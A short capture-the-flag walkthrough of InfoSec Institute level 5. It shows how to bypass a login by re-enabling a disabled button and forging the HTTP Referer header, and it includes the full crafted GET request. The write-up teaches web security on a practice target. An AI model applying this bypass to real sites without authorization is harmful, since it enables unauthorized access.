A Step-by-Step Walkthrough Solution to CTF LEVEL 5 INFOSECINSTITUTE (Practical Web HACKING)

The Level can be accessed here.

The Question says :It seems you have encountered a page which requires users to login before viewing. Do some magic without having to log in.

The hint says you need to play with the headers , HTTP_REFERER

On analysing the source code we see that the login button is disabled

We remove the code disabled using the inspect tool in firefox and go to the login page which is available at the page login.html . [location: http://ctf.infosecinstitute.com/ctf2/exercises/login.html ]

Using the firefox addon LIVE HTTP HEADERS we find the details of the http request made when we click on the login link. we find:

Screen Shot 2015-09-25 at 1.34.43 am

Now the final step we need to change the default referrer to http://ctf.infosecinstitute.com/ctf2/exercises/login.html by using the replay button at the bottom of the dialog box .

So we make a http get request to the level5 page with the referrer as mentioned above:

    GET /ctf2/exercises/ex5.php HTTP/1.1
    Host: ctf.infosecinstitute.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://ctf.infosecinstitute.com/ctf2/exercises/login.html
    Cookie: _ga=GA1.2.1087367223.1443120058; PHPSESSID=kft73fn8csor9k0f0s4n5hkdv4
    Connection: keep-alive

and we get the success message:

The same can be achieved using burp suite free addition as well.